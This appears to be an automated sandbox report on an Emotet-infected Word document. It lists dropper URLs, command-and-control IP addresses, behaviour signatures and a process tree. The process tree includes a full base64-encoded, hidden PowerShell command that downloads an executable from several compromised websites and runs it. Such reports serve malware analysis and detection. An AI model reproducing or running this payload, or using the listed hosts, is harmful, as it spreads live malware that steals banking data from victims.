Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    131s
  • resource
    win7v191014
  • submitted
    18-12-2019 02:53

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_f74096ebda3111ae38a2fb3111e7b3a5.10

  • Sample

    191218-fa63fl5q92

  • SHA256

    62e051e8280e64e568fe1b0f8034167a2c73fc4572baa737aae85f7c26d59ea6

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://apkiasaani.com/wp-includes/YDpCjo/
exe.dropper

http://dathachanhphongthuy.com/wp-content/4jul9js6-nees-96/
exe.dropper

http://d4.gotoproject.net/calendar/stg8bg-eqs8q528-652549445/
exe.dropper

http://ekobygghandel.se/wp-content/tflGWFifb/
exe.dropper

http://feroscare.klyp.co/CRM/4w74w-ubw-364157142/

Extracted

Family

emotet

C2

69.14.208.221:80

156.155.163.232:80

211.42.204.154:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

69.30.205.162:7080

182.176.116.139:995

72.51.153.27:80

124.150.175.129:8080

96.234.38.186:8080

139.59.12.63:8080

220.78.29.88:80

190.38.252.45:443

128.92.54.20:80

94.203.236.122:80

46.105.131.68:8080

162.144.46.90:8080

59.158.164.66:443

95.255.140.89:443
rsa_pubkey.plain

Signatures

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Modifies registry class 144 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_f74096ebda3111ae38a2fb3111e7b3a5.10.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1376
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000608;0000000000000650;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1100
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000608;0000000000000650;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:816
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABOAHYAZwB6AGcAcwBmAHUAaAB2AD0AJwBBAHcAYwByAG4AeAB0AGMAYgAnADsAJABZAHcAdQB0AGcAcQB6AGsAYgAgAD0AIAAnADEAMgAwACcAOwAkAFQAcwBkAHkAZQB4AHcAYwA9ACcAQgBzAHUAbwBiAGcAeABoAHEAawBtACcAOwAkAEIAcABvAGIAbwBpAHkAYwBjAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAHcAdQB0AGcAcQB6AGsAYgArACcALgBlAHgAZQAnADsAJABXAGUAegBsAG0AaABxAGoAawBrAGMAZgA9ACcARwBxAGoAeQBqAHQAawB1AGoAdwB5ACcAOwAkAEYAeABqAGIAcQB0AHkAcABvAGwAagBvAHQAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAQwBMAGkARQBuAFQAOwAkAFAAZQBiAHAAcABiAG0AcQB0AGIAPQAnAGgAdAB0AHAAOgAvAC8AYQBwAGsAaQBhAHMAYQBhAG4AaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWQBEAHAAQwBqAG8ALwAqAGgAdAB0AHAAOgAvAC8AZABhAHQAaABhAGMAaABhAG4AaABwAGgAbwBuAGcAdABoAHUAeQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADQAagB1AGwAOQBqAHMANgAtAG4AZQBlAHMALQA5ADYALwAqAGgAdAB0AHAAOgAvAC8AZAA0AC4AZwBvAHQAbwBwAHIAbwBqAGUAYwB0AC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBzAHQAZwA4AGIAZwAtAGUAcQBzADgAcQA1ADIAOAAtADYANQAyADUANAA5ADQANAA1AC8AKgBoAHQAdABwADoALwAvAGUAawBvAGIAeQBnAGcAaABhAG4AZABlAGwALgBzAGUALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABmAGwARwBXAEYAaQBmAGIALwAqAGgAdAB0AHAAOgAvAC8AZgBlAHIAbwBzAGMAYQByAGUALgBrAGwAeQBwAC4AYwBvAC8AQwBSAE0ALwA0AHcANwA0AHcALQB1AGIAdwAtADMANgA0ADEANQA3ADEANAAyAC8AJwAuACIAUwBQAGwAYABJAHQAIgAoACcAKgAnACkAOwAkAEYAdQBtAGIAcgBmAHgAaAB1AGYAbQA9ACcAWQBnAHIAaQBzAGoAbQByAHEAcgBnAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAZQBhAHEAYwBwAG0AeABmAHUAeABnACAAaQBuACAAJABQAGUAYgBwAHAAYgBtAHEAdABiACkAewB0AHIAeQB7ACQARgB4AGoAYgBxAHQAeQBwAG8AbABqAG8AdAAuACIAZABgAE8AVwBuAEwAYABPAGEAYABEAEYAaQBsAGUAIgAoACQARgBlAGEAcQBjAHAAbQB4AGYAdQB4AGcALAAgACQAQgBwAG8AYgBvAGkAeQBjAGMAKQA7ACQASgBiAHYAYwBtAHEAdQBrAG8AeABqAGwAPQAnAEcAbQBrAHgAbwBvAHYAZABkAGEAZQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEIAcABvAGIAbwBpAHkAYwBjACkALgAiAGwAZQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADEAOQAyADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAEEAYABSAHQAIgAoACQAQgBwAG8AYgBvAGkAeQBjAGMAKQA7ACQATwBkAGYAcABvAG0AbgBmAHkAYwB6AHMAPQAnAFIAdAB6AGcAagB3AGsAZQBoAGoAdwAnADsAYgByAGUAYQBrADsAJABHAHkAdQB5AHgAaQB5AHYAbABzAHQAdwBuAD0AJwBOAGgAeQB3AG8AaQBtAGoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBtAGsAawB2AHYAcwB6AG8AaABoAGUAZQA9ACcAQgByAGYAYgBmAGsAdgB0AGoAcQAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    PID:1832
    • C:\Users\Admin\120.exe
      "C:\Users\Admin\120.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:680
      • C:\Users\Admin\120.exe
        --1aea008d
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:2052
  • C:\Windows\SysWOW64\wrapiplk.exe
    "C:\Windows\SysWOW64\wrapiplk.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:2108
    • C:\Windows\SysWOW64\wrapiplk.exe
      --e814262
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:2124

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\120.exe
    Download Submit

  • C:\Users\Admin\120.exe
    Download Submit

  • C:\Users\Admin\120.exe
    Download Submit

  • C:\Windows\SysWOW64\wrapiplk.exe
    Download Submit

  • C:\Windows\SysWOW64\wrapiplk.exe
    Download Submit

  • memory/680-12-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1376-3-0x0000000009520000-0x0000000009524000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1376-2-0x000000000636B000-0x000000000636F000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1376-1-0x000000000636B000-0x000000000636F000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1376-0-0x0000000006270000-0x0000000006274000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2052-16-0x0000000000400000-0x0000000000454000-memory.dmp

    Filesize

    336KB

    Download

  • memory/2108-18-0x00000000002D0000-0x00000000002E7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2124-20-0x0000000000250000-0x0000000000267000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2124-21-0x0000000000400000-0x0000000000454000-memory.dmp

    Filesize

    336KB

    Download